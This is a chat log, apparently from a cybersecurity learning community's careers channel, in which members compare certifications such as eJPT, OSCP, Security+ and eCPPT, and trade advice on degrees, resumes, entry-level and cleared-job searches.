This. For example Google has "Information security engineer" as a catch-all for applicants that have security experience, but are not directly applying to any specific team

uh , is CPENT course worth it

not really i wouldnt recommend

you will be better off with OSCP,eCPPT

Thoughts on eJPT? I'm planning to take it a couple of months after I take the Security+ this coming 3rd quarter of 2021

eJPT is a very good certification to start improving your Pentesting skills and learning fundamentals of Networking, Cyber Security and Programming and then have and pracitcal expereince via the exam

would highly recommend

its a really good cert, if money isn't a factor ($200 i think?) then I think this cert should be damn near mandatory for people new to infosec

Sec+ exam is also much harder than eJPT, you may want to get eJPT first depending on your goals, Sec + will get you an interview, eJPT will make the conversation interesting

and here I thought sec+ is easier than EJPT

37 days until my sec+ exam

so i will say that the timer is currently running on my eCPTX exam and I'm not thrilled with it

DA is possible in under 5 minutes kekw

ah so it's very life-like then haha

kind of, not really

im pretty sure I did a ton of unintended things

if you haven't taken a comptia exam before its difficult in the sense that they ask questions in a very particular way and involve lots of rote memorization

wait what

is it that easy supuki?

i was plannign on giving it soon

its rated as one of the hardest exams

all's ill say is that I used the same tactics APTs use, and justified it by the same thing.
Oh and things are 100% broken in the environment kekw

ahh intresting

from what i have heard from people who did it , the intended path is super hard

also is it v1?

or v2

sort of my weakness then, i'm bad when it comes to memorization but okay for practical applications. i'll lobby sec+ for the time being then, will get eJPT first

the only reason i would say eJPT is easier is because its super practical and hands on

don't let me discourage you if your goal is to get a job or some entry-level position, eJPT is unlikely to help you there, take a look at some free online test-banks for Sec+ and you'll get a feel for how the questions are asked

ive heard the exact opposite. The only reason the intended took me so long is because my smbclient was jacked

for v2?

ye

so weird

smbclient can mess around a lot, I always to use it in conjuction with others tools.

-m NT1

despite it being in my smb config file, it simply said "no"

thanks for the advice, i'm still taking Sec+ but will probably only take it once I'm confident with my knowledge. I'm more off a hands-on kind of learner so memorization and theories are fairly harder for me

what would you recommend to study then? The materials are suffice?

Throwback, I personally think giving INE more money is a waste lel

their course content isn't really that great

i wouldnt say soo cause the course materials helped me a lot

But Throwback isnt that a little basic

the things you do in that exam aren't advanced kek

there's this mythical thing surrounding eLS exams, that they're hard and all. Really, you can do it in one day while the course material holds your hand

eCPPT is 7 days long, that's A LOT of time.

eJPT gives you three full days to complete their exam, that's a lot of time i must say

thanks that helps wanted to do the eCPTX

i mean its always good to have a lot more time for people who are working and all

also what's the reason why eJPT is less likely to help me land a job in the industry? is the certification not respected at all?

yeaah eJPT takes you like maybe 6ish hours

i wouldnt say so arkin

i got my job with the eJPT

I'd love to try and speed run eJPT

I see, place of work is probably a big factor when concerning certifications.

i got eJPT done in just under 4 hours with little experience, but I was also speedrunning thm and htb before

yeaah i would say sooo

lets put it this way:

eJPT can show willing to learn and applying yourself tbf

the eJPT is more so popular in Europe/US ina way

thats my metric for gauging certifications

there are a lot of different certs out there that some companies only list the "big" ones on job boards

the thing is eLS is not well known as a certifying body like CompTIA or GIAC are

yeaah they are not very recognized yet

eJPT is more entry level than OSCP

but i really like what they are doing with the certs

actually teaching hands on skills

eJPT yeah its super basic but still helps when you are getting started

Would u say compTIA certs are overrated? I know people with sec+/net+ etc and honestly aren't that switched on.

id say a majority of certs are overrated tbh

but comptia will land you interviews

Sec+ is an entry level cert and will open doors. It provides employers with a base level of understanding that you will have

compTIA are just more known since they have been around longer

Yeah I need to get Sec+ tbf

Sec+ is not the most essential thing but i have heard people getting jobs with it

it shows your commitment

I have seen some job postings where it is just an alphabet soup, but the ones that know the certs have a bit more focus

thats a good number of job openings for eJPT

like most of the begginer certs

7 is good? lol

Yeah a lot of the jobs I was applying to Sec+ was the requirement

If you didn't have it then sorry

oh i didnt noticed the "7 results" lol, i initially thought you just havent scrolled down

And i did not have it lol

even though there is no job posting with eJPT included between certs in my country, I did it to validate my beginner knowledge and also learn something new. I can only recommend doing this exam.

i mean

most companies don't have hard set requirements unless they contract with governments iirc

eJPT is super begginer after all

Ding ding ding

its the same for their whole cert stack

and knowing why is incredibly disappointing kekw

the thing is with certs like eJPT they are like having an interesting art piece, they can lead to a good conversation in an interview like it did for me, it began with my interviewer asking "so what is eJPT?" and that opens up the conversation a TON

the deeper you dive down the rabbit hole, the worse it gets

about the same

the trick in the U.S. is getting the interviews first, which without your 4yr, you're not getting that conversation

if you list a cert on your resume/CV be prepared to be asked questions around it

DF certs are rabbit hole with a ton of vendor specific stuff

nah elearn certs are good

And hella expensive

specially for learning

which should be the main objective of getting certs

this is exactly it, I'm not a great people person but I can talk about tech in-depth for hours and hopefully nerd out with the interviewer

and they dont have that much brand recognition yet but they are super up and coming

I am similar, but I have been learning how to "sell" my self in interviews though

oh lol, might be a big problem for me. i dont have a 4 yr B.S since I left school for a startup

some companies have experience to degree calculators that they use as well

but often limit certain positions to degrees

yea that's understandable, i saw a couple of jobs from FAANG that requires you to hve degree since part of your job is doing research and stuff, but generally i'm a huge supporter of considering experience and hands-on knowledge over degrees

the great thing with security is that any general business degree can get you an interview

Degrees show you have strong academic skills, show nothing about being able to do the job, certs do. My opinion

100% true, now only if HR thought that wau

a mold not so easily broken

Hey everybody! Is there anyone familiar with the ICS/ OT security field?

best to just ask your question

I’m trying to look into an entry position in that field but not sure what “position” I should be searching for? Everything I am coming across is for advanced positions only

Try finding for Student Positions, but if you are looking specifically at job roles : junior penetester, Risk Analyst, Cyber Analyst should maybe be some good ones to look for

I’ll definitely do that, much appreciated

no problems

I don't know if there are many entry positions in that area. There may be internships that involve aspects of it though

A lot of the IOT stuff that I saw when applying were mainly research positions that required experience and higher degrees

Yeah that’s what I am seeing as well.

whats up, is there anyones brain i could pick possibly? I recently just got my eJPT and now im working on getting my oscp. Im fairly young so i dont have much experience in the industry like alot of junior jobs require. or job experience at all really. Ive also been interested in pentesting/defending live game services but im unsure where to look for information for that kinda stuff or is it just an experience kind of thing. Any advice would be greatly appreciated!

What do you mean by defending live game services?

I assume they mean things like Blizzards battle.net, MMOs, etc.

yeah^^

ive seen cyrex tech thats looking for a remote position

i think i might have worded that poorly, but i mean like the servers of MMOs and things like that nature

still think i worded that poorly again but

chances of getting a remote infosec job without any prior experience are extremely slim to none

but if you're interested in gamified defense scenarios theres some CTFs with the Attack/Defend category and also HTB has Battlegrounds

you can also do some blue-teaming in KoTH on THM

hopefully when all the networks are released THM can start working on some cyber-ranges for live red vs. blue

gotcha alright, thank you @ancient prairie

by all means go ahead and apply regardless when you see jobs pop-up and keep your resume updated so its ready at a moment's notice - just dont get too set on making a remote job happen for your first

worst-case scenario you just get an interview and don't get the job regardless :p

thanks man, much appreciated. guess im just getting a tad nervous

Definitely possible. Takes a good deal of work and networking, but it's not impossible.

can confirm, my former employer asked me for any suggestions as to who they can get to replace me.

Always try to stay on good terms with everyone you interact with reguarly. You never know who might think of you.

oh, also worth noting, if you've got a smaller firm in your area who doesnt ever have any apps open, express interest via email, you never know who might have an opening

fair points, I was over-generalizing a bit and just assuming they don't have a network to rely on but yeah knowing people will generally subvert any interview process

Not really a career question but I am looking into colleges and am wondering what majors I should look into.

Thoughts?

Ethical Hacking

Gotta come to Scotland though

Cant do that anytime soon lmao

Im thinking computer science. Dont know for sure though.

Are you US?

Shoot me a DM if you have college questions if you want. I just graduated last May

Hey Moose, may I DM regarding this stuff?

Computer science is the most common BS degree for those going into Cyber Security

I added you. Can't message until accepted.

and why is that? What would you suggest instead?

@fringe spade yes and @glossy flint accepted

The reason is Computer Science sets up a great foundation for those going into cyber security. There are some Cyber security programs in the US but some of those may miss the foundations and they are still newer types of degrees.

Looks at Bachelor's in Cybersecurity hanging on the wall 👀

Lol

i'm not condemning them but there is wide variability in Cybersecurity degrees and it may not be the best option for people with zero work experience

Comp Sci degrees tend to be more consistent

as someone who recently went through an A.S. in CyberSec, I'd recommend CompSci or Networking.
Those who do networking are typically Cisco Academy's (you can look up if they're one on Cisco's website) who are top notch no matter who the instructor is. The god thing about Cisco other than incredibly wide use is consistency among teaching material

Try getting a CyberSecurity Degree, i am doing my Bachelors in Cyber Sec now

and it helped me get my first job and opened a lot of opportunities, but that is if you are aiming for Blue/Red/Purple Teaming

Most Cyber Sec Bachelors Degree deal with touching on basic fundamentals of most of the important topics that you will touch in your job if you work in cybersec

honestly a compsci degree will be just fine and really I havent particularly heard of any cases that a cybersec degree got anyone any close to a job or interview than a compsci degree. If you really want to you could take the same route Im going and get a compsci major with a minor in cybersec as some colleges like mine even require a minor along with a compsci major

Honestly if you are in TryHackMe Discord than any computing degree at all will be good because you'll learn most of what you need to know through THM

Hey guys,
I have done the Comptia a+ courses and Network+ courses...

So for next step,
Should I start with Linux and then go for Security+ ??

security+ would be a good step if your goal is a cyber position

I don't even know the fundamentals in linux...that was the reason I asked

Security+ isn't vendor/OS specific

It covers a wide range of topics and looks at the security space as a whole. If you want to see what sort of topics are covered Professor Messer has free videos on YouTube that cover all the topics on the 501 exam. Keep in mind 501 is being fazed out this July for 601

Thanks for information

you might want to do some of the Linux rooms on TryHackMe then

Yeah if you're coming in with no experience I wouldn't try and rush to take 501. Do some THM rooms as Zojja said and kind of get a feel.

I also don't know where you're at knowledge wise. If you look at the videos and some other material and feel that you are capable of being tested on it by all means take 501

I started with beginner course

No waaaay

Ahaha, okay so here's the thing

What is the pricing?

"all INE subscribers have access to the labs associated with our Penetration Testing Student learning path."

this reads as if its only the PTS labs and nothing else

@exotic epoch could you confirm if this is all labs or just PTS labs?

Ohh .. I was too fast ..

yeah same, now I need some confirmation if I'm reupping my sub or not lol

Read it once again and I understant it that it is only for PTS..

thats the same vibe I'm getting but why email blast something that they already have access to

unless things are planned to change soon?

Including labs only for the annual is ..

I would love to do eNDP but it is not worth to pay the annual just to get access to labs.

It means if you have an INE account you get PTS for free.

kekw

still a joke

I dont understand the value at all of the bland slides and nothing else

It’s the entire thing with labs. What are you taking about?

without the labs its beyond dry

not month to month as from what Ive seen but at this point the communication is so unclear I have no clue what plan is what and what theyre offering

The PTS course gives you access to all the labs.

Any subscription to INE gives that.

Monthly offers only course materials, minus the PTS course (you get the course and labs for that). I agree I’m not a fan of the monthly option. But at $750 a year for the full sub, it’s hard to complain, unless it’s a couple of the people regularly doing so in this channel.

and honestly there are other things that Ive seen happen that have worsened my taste, after I am done with eCTHP I will more than likely not be engaging in any form of ELS or INE

I still don't understand why they felt the need to send an email blast because it was included with the starter pass, no?

There was an issue that the monthly sub wasn’t including it.

I mean thats hard to judge as I never see you in here most of the time? I also see it far past this channel of people complaining

So they fixed it and blasted it out.

Guessing that is the reason for the email anyways.

oh geez

had to read that again

said as of this week

not only for this week, thats better than what I was thinking initially

The email pertains to correcting an issue with the subscription levels not having access to the PTS course and labs.

Anyone know if the Google Online Certificates will help with anything in the future?

I am still in high school so I am thinking maybe with internships/jobs in a few years?

Just wondering if I would be wasting time to accumulate Google Certs.

I have the Google IT cert and can't really recommend it, its not a half-bad course and if they changed the exam structure to one thats proctored then it would be a welcome change from the A+ which it is trying to compete with

short of Google certs becoming more popular throughout the years, a CompTIA cert will hold more value

^^^ agreed

but as someone in high-school, if you're gunning after internships then I think its a good idea, much cheaper than Comptia exams and still shows initiative to companies you apply for

A+ is more expensive?

as someone who is in the exact same position as you, I dont think that cert is going to do a thing for you

Google cert is free if I am correct. CompTIA seems to be 200-500 depending on the course.

you can knock out the google cert in like 2 weeks and I think pay $29? and then the A+ is 2 exams + coursework you need to buy

Correction: Free for the first week then it doesnt say. Droogy says 29 so it might be 29.

ah okay yeah that sounds right, I got it for free thru my school so I don't remember but I'm sure its still cheap

at your age anything is better than nothing but definitely do a little research and figure out what certs will best align with your goals and see where your energy is better spent

has anyone had success in securing employment, using THM as "experience" ?

if you work for THM, yes! I'm a contactor and I've got hired with help of stuff I do for them, if you don't work for THM, it's mainly just education/training. Not so much experience

Yeah, I wouldn't put it under experience if you were just completing rooms?

Interesting, I'm going for my degree in Net/Sec. Maybe an application is due in time 😉

if you are in an interview and someone asks how you stay current or get knowledge, you could raise it at that point

Is anyone here familiae with the UK job market? Does the class of your honours degree matter?

I beileve @ruby remnant knows a lot about the UK market

https://www.theregister.com/2021/03/11/f5_critical_flaws/

If any of yall are using this at work. Godspeed

Howdy

Happy to chat here or DM

but tl;dr

just dont get a third

tbh even then who gives a crap, you still went, you worked hard

I know a hell of a lot of companies, especially around me (Cheltenham) wouldn't care if you had a degree or not

Hey, just out of interest is a 2.2 and a msc fine?

yeah absolutely

msc in?

Psychology with experience of using python for stats.. undergrad in computing with some games development

well, you're already thinking on the right path

your bit of paper is irrelevant

what's gonna matter is the skills you've learned

once you're in front of someone, they're just gonna want to see that you've got a strong interest, a willingness and ability to learn

nobody expects a grad to be a pro tier SOC analyst, pentester or whatever

so its much less about your quals and a lot more about your enthusisam

Thank you :) ive been teaching myself some computer networking and bash scripting in linux.. i find cyber security fascinating.. i taught the NPA in cyber security for a while, tried training to be a comp sci teacher once, but other than that i have no experience

One of my buddies moved from secondary teaching to pentesting

Very good to know that my 2.2 wont be the barrier i think it is :)

i dont think I was asked what I got, or what subject LOL

Its certainly an interesting area i would like to look into.. i have found messing around with pen testing tools on kali linux, for example, very interesting

sorry for double post but thought people would be interested, SANS has announced a free "New to Cyber" summit for April 21 https://www.sans.org/event/newtocyber-summit-2021

nice, I've been going to all their online summits, really good stuff + I think you get 6-8 CPEs a pop

btw if you're not a CISSP or require CPEs should you maybe list how many you've accumulated? I have a decent chunk this year

yeah they have some good ones, I stopped going to their webcasts because they were too salesy but some people have spoken well of the summits

do the Comptia certs not require CPEs?
For many companies, you have to do a self assessment at the end of the year, may be useful to mention the CPEs there

ah I've totally forgotten CompTIA does have a continuing education program, crazy I only have another 2 years left before I gotta renew - goes quick

good point on the self-assessment, I did mine about a month ago and didn't even think about that :p - but I'm new anyway so they're not expecting too much

hello

Please dm me, it would be great if I could talk to you.

the people here can generally answer career questions better than I can, so it's best if we limit it to this channel

guyz

could u pls teach me hacking

Hey, we learn from a website called tryhackme.com

You can signup and learn from there which teaches ethical hacking and cybersecurity

!website

Comptia requires CPE

thank you

Hi All- I need some advice. I turn 48 soon, which makes me ancient in this world- especially when it comes to jumping into a new-to-me field like pentesting. A little background: I have an IT services company, we take care of mostly Windows networks, I got my first MCSE in 2003 . Here's the thing: I really think there's a market for pentesting small-ish clients (10-25 seats). I want to offer that service.

The problem: I have started and stopped with HTB and THM a bunch of times over the past couple of years and I'm at a point where I need to shit of get off the pot. I get like 2 weeks of solid time into different boxes from TJ's list then life/work interfere.

We're in a position where we could hire this talent, which we may do. Ego or not, I want that OSCP- and I feel like I need it to market that service to clients and other service providers.

Given all that- if anyone else has found themselves in this same boat- I'd love to know how you moved forward.

My estimate would be for those sized companies, that services would be geared more towards Security Policy Audits/reviews, Security Assessment, Vulnerability Assessment (likely automated). Also varies greatly by industry segment a business is in.

@distant pier thanks I agree, that does seem to be the typical services for smaller clients- how can we push pentesting? Is it unrealistic to think it’s a viable service for smaller security focused companies?

I would just change the business model. Model threats of lower severity for less time and charge less. These smaller companies are less likely to be targeted by apts so you have less you need to worry about. Doing your best work doesn’t always mean writing custom malware and social engineering on steroids, but providing what the client actually needs. And they need more than a Nessus scan for sure.

well depends... supplier security is a big issue, if its a small company that provides services or goods for larger companies, they are generally thought to be prime targets as the larger companies have tightened their security

I'm going to agree with tim, penetration testing may be something to add but most of them need the most basics. I was going through the FedRAMP moderate checklist (available online in excel format) with a small potential supplier and they couldn't meet everything there. There are also various online checklists through CIS for example.

@grave needle @pseudo creek great answers here. Thanks! I find I’m trying to meet the needs of our clients AND satisfy a personal goal and interest. I guess I need to figure out how I’d leverage those skills and it might look different than a typical pentest engagement. This blog post got me thinking about all this recently: https://www.offensive-security.com/blog/

@forest knoll @fringe spade Because of the discussion the other day about certifications, how best to get my foot to OSCP. I've been reading through a few things about OSCP etc. over the past few days. Now I came to a questionable path - Which would be (in order):

1. eJPT
2. eCPPT
3. OSCP
   Would the path just listed be better than the one coming now?:
4. eJPT
5. OSCP

eCPPT I've heard is a like an easier OSCP but with pivoting.

I did eJPT > OSCP (I think that Magna did it this way too) and it's not too bad

Although eCPPT will also be fine if you have the money

That's exactly why 😄 Because I read this blog post: https://www.reddit.com/r/oscp/comments/ho0j5z/oscp_vs_ecppt_my_experience_with_both/

that is a nice sales pitch from them... I get what they are saying, nothing wrong with looking at the OSCP, you don't have to be a pen tester to apply the knowledge (which is what they are saying)

Okay and you did well with the OSCP after the eJPT? What is your background, have you worked in cybersecurity before? @fringe spade

Have you actually done OSCP yet Vertey?

Could have sworn you were still on PWK

I mean I do PWK, but still eJPT to OSCP is a good jump because the material of OSCP perfectly begins in the place that eJPT ends

curious, what does that mean? the PWK stuff seems to start at super basic

Material of PWK. OSCP is a whole different ballgame.

That's where eJPT ends

eJPT is super super basic

thats why I'm asking... its like "this is linux...here are linux commands... this is how you write a bash script"... what does eJPT cover ?

this is a computer?

more like this is an IP address

oh

I agree, but still he will be able to understand what's going on after eJPT

That's what really unsettle me about the blogpost, especially the ending:
And I agree with John Hammond (Another great Youtube resource) in that I think someone who passed the eCPPT could pass OSCP without studying for it. But not the other way around.

Sales pitch for sure. I think I just need to take this attitude goi g forward:

that is pretty much my attitude

I don't think it would work that way for most of us

What do you mean exactly?

Both of these courses are quite different, so not everyone would be able to smash OSCP after eCPPT or vice versa

Okay. I'm still undecided about how to go. But my heart tells me eJPT < OSCP.

Yeah, even if you don't want to pay for the eJPT cert, complete the material so that you have a nice "prologue" for the OSCP

However, I think I'll still take the eJPT just to have been in such an exam situation and to be able to prove my skills.

It's a nice confidence boost honestly

And that's already a good start for the incredible OSCP journey 😄

Agreed

👍

engulf yourself in the eJPT then live for the OSCP

eLearnSecurity has their own methodology, like implementing routes which you don't really see at all in the real world. If you're a competent pentester and not a CTF player, I think the statement is false, if you're a CTF player and nothing more, then it's probably true.

to me, the OSCP is being able to think on your feet and develop your own methodology, where as with eLS it's "if you can do the course, you can pass the exam", which is very narrow in scope, for the most part. Monkey Read Monkey Write His Own Book vs Monkey See Monkey Do

Hi all, I need a piece of advise. We are currently applying for intern season at my uni and I have to create my CV & linkedin prof. I will probably apply on a cybersec forensics company and maybe as a DevOps or Backend engineer on some others. My meme question is; Should you add the advent of cyber 2 cert on linkedin?

meme question

well it kinda is, isn't it?

The only problem I can see with the AoC2 cert is that it may not be recognised.

Anyone here have a good resource for pentest+ comptia?

There's a THM path for it that comes with a discount?

is pentest+ even worth?

Only for DoD really

CompTIA PenTest+ Study Guide Exam PT0-001 by Mike Chapple and David Seidl.

Thank you very much

I found eCPPT harder.

You also did it first though

Given a lot of the topics are fairly similar, I would imagine (subconsciously or not), one is good preparation for the bulk of the other

Sure, I agree with that. Although neither exam really has much of anything fundamentally in common.

Beyond having Windows and Linux machines in them.

Fair :)

Is there any good course to learn linux from basics to advance.... ??
I'm not getting which course should i pick up and start.....
After starting up with linux...I can also do my practice in try hack me-- linux fundamentals..

After Linux Fundamentals 1,2,3 you can continue your Linux journey with the following rooms:

Linux Strength Training
The find command
Linux: Local Enumeration
Linux Backdoors
Linux Modules
Common Linux Privesc , Linux PrivEsc , Linux PrivEsc Arena
Hardening Basics Part 1 and Part 2

Gaining knowledge these rooms provide, I would consider one advanced after completing them.

Thank You💯
Btw,,,is it worthy to start now or should I go for Security+ ??

Do the rooms for fun while studying for the Sec+

sure... thanks

Also see the Module for Linux on the TryHackMe site, which is a collection of Linux related rooms: https://tryhackme.com/module/linux-fundamentals

yeah, I'm planning to get some basic overview first and then side by side... I'll look after this

Hi everyone! I just passed my Security+ exam today

Congrats 🙂

Thanks!

So I took the test with PearsonVue and they have the results in their "Online Exam History". Is that all I need to show employers that I've got the cert?

I'm kinda not sure if I'm just supposed to plop it on my resume that I'm certified. (I live in America if that makes any difference)

Yea, you should definitely put it on your resume

See if there is a print out version. Would hate for it to disappear. What resources did you use and how long did you study?

I used Darril Gibson's Get Certified Get Ahead Security+ book for SYO-501. I spent about 3 weeks reading through the book and the last week just kinda doing practice tests/internalizing the info

It looks like on the actual CompTia site they take up to 5 days to import test results (to show certificates) so I might just check back there later.

Cool. I'm doing Gibsons book and Professor Messer. Exam is next month. Been procrastinating lol. Was supposed to take it last June

Ah, I see

Best of luck to you!

Thanks!

they will also send you a physical copy of your certification, I got mine about 3 weeks after I passed, and I could download the digital version about 2-3 days after passing

Oh okay! Thank you

Yeah, I was kinda unsure how that process was gonna go

how do you guys build a resume? like what software do you use?

microsoft word has a few templates and there are a lot of free resources online, but word is good because you can save the file as a pdf

cool thanks, i looked on there, but wanted something a little more easily customizable.

I write my resume in a typographic language, and keep it on github without PII.

ty

yeah i was thinking of using html/css for it

That's doable, but won't render cleanly to a PDF. I'd say use something easy that has render software freely available, like markdown or asciidoc. If you are feeling particularly ambitious, there are some very nice LaTeX templates out there as well.

ty

Control P, print to PDF.

It's hard to control the rendered typographic output using that method.

It really isn't.

CSS can apply specifically to printed info too with media queries

Sometimes the kerning and other spacing elements are just a little off

I'm also not a CSS guru - I know latex and adoc much better. My experiences with CSS have always been 'spend more time fiddling with CSS templating specs more than I do writing'. LaTeX feels much more consistent to me

I like the pre-made resume templates from Canva a lot, clean and not-boring designs

also if you're EU or in an industry where they do the weird headshot in the resume thing, they have templates for that too

never had to submit a headshot, but I have seen a lot of the new online forms ask about social media like LinkedIn, Twitter, etc

thank you!

I use Awesome-CV

It's LaTex powered

This is probably the best book on the subject of resumes 😄 https://thetechresume.com/

i have this idea of becoming a privacy technologist but do not know where to even start

listen to everything Michael Bazzell writes and says, good place to start 😄

he has a book called Extreme Privacy that may be up your alley

@ancient prairie thank you very much, i will!

Anyone know, if I leave the Army as a 17C Cyber Network Operator, with at least Net+/Sec+, how easy it would be for me to get a job around $100,000 without a bachelors?

do you have some type of clearance? If so you got a pretty good shot

it will depend on the company and how they relate the experience, I would recommend using the TAP resources to help get a good leg up as they have connections

Given that you are most definitely cleared I would hop on Clearancejobs and start putting yourself out there. There are also a couple of good veteran groups on LinkedIn from what I've heard. Their names are escaping right now though

@ancient prairie @stoic cave yeah I do

Standard that you get for joining the Army or higher? You don't have to specify

Higher

Rog yeah definitely hop over to clearancejobs

USA jobs would work too as you have prior experience you can skip a lot of the lower GS levels

Cool, thanks. I was mostly concerned with not having a degree but I guess using those tools mentioned, I should be fine.

From my understanding already being cleared, and having prior experience, will allow you to waive the requirement

Depends on the company though

👍

Oh before I forget clearancejobs and Cleared Jobs.net regularly hold virtual job fairs

@warm hinge April 8 Cleared Job Fair AZ, CO, NM, NV, SoCal, UT just got this email today

Oh cool, I'll check it out.

Don't know if that's your region but this was ClearedJobs.net

I'm not getting out for a couple years but if I was, I'd be 100% open for relocation.